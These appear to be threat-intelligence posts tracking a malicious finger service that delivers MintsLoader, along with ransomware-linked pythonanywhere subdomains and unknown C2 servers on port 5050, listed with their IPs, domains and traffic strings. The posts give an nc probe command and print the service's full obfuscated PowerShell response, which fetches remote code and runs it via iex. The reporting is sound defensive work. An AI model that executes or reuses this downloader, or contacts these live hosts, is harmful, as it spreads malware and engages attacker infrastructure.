This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

RE: https://infosec.exchange/@netresec/115905237000922504

This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

You can probe it with:
nc 64.190.113.206 79 <<< rcaptcha

The malicious "finger" service now gives this response:
powershell -w h $huwcsxf='ur' ;set-alias hf7wz32e c$($huwcsxf)l;$infqtmrw=(2231,2243,2243,2239,2185,2174,2174,2237,2248,2224,2229,2243,2245,2249,2177,2173,2243,2238,2239,2174,2176,2173,2239,2231,2239,2190,2242,2188,2177,2180,2226,2179,2180,2228,2229,2228,2172,2176,2177,2225,2183,2172,2179,2228,2176,2227,2172,2225,2184,2175,2225,2172,2227,2225,2225,2224,2182,2226,2228,2227,2177,2176,2224,2226);$zpsmnihtrogcqb=('reicporet','get-cmdlet');$gsrwpaztvi=$infqtmrw;foreach($yxbwqtafvdn in $gsrwpaztvi){$ptwnmclaqfgh=$yxbwqtafvdn;$wyngvtsfirm=$wyngvtsfirm+[char]($ptwnmclaqfgh-2127);$ljfaixwhpztnkv=$wyngvtsfirm; $axfzykqljsnrwc=$ljfaixwhpztnkv};$uecbvofzghikt[2]=$axfzykqljsnrwc;$sdypqv='rl';$gkmvohls=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(hf7wz32e -useb $axfzykqljsnrwc)

#threatintel

@james_inthe_box
xmb.pythonanywhere[.]com (2024-08-18 -- 2025-09-17)
tdroot.pythonanywhere[.]com (2026-02-10)
https://www.joesandbox.com/analysis/1494487/1/html

#razr #ransomware

@james_inthe_box Seems like they just get a new subdomain on pythonanywhere[.]com for each new campaign. Might be a good idea to put pythonanywhere on a blocklist.

156.254.20.94:5050 on ANY.RUN
https://app.any.run/tasks/31811332-56ec-4fff-a134-43a1a699cfc8

192.253.229.223:5050 on Triage
https://tria.ge/251217-cgb4kafr9y

Found two more C2 servers with the same Accept: */* and frAQBc8Wsa1xVPfvJcrgRYwTiizs2tr strings. These ones run on TCP 5050 as well.
192.253.229.223:5050 (last active December 2025)
156.254.20.94:5050 (last active December 2025)

#Threatintel

Sample on Triage with the same C2:
https://tria.ge/260207-p7n72aft4c

This sample is classified as ValleyRAT on ANY.RUN, but the C2 doesn't look like ValleyRAT either
https://app.any.run/tasks/ca8080c4-8dc8-4107-b261-f16a69e5dac1/

This sample is classified as FatalRAT on JoeSandbox, but the C2 traffic doesn't look like FatalRAT
https://www.joesandbox.com/analysis/1865230/0/html

We’ve stumbled across an unknown malware C2 protocol. Do you know what this is?
47.83.173.19:5050
47.84.203.73:5050
xuanwcai[.]com:5050
wkaiuahaaxx[.]icu:5050

Characteristic strings in C2 traffic:
Accept: */*
frAQBc8Wsa1xVPfvJcrgRYwTiizs2tr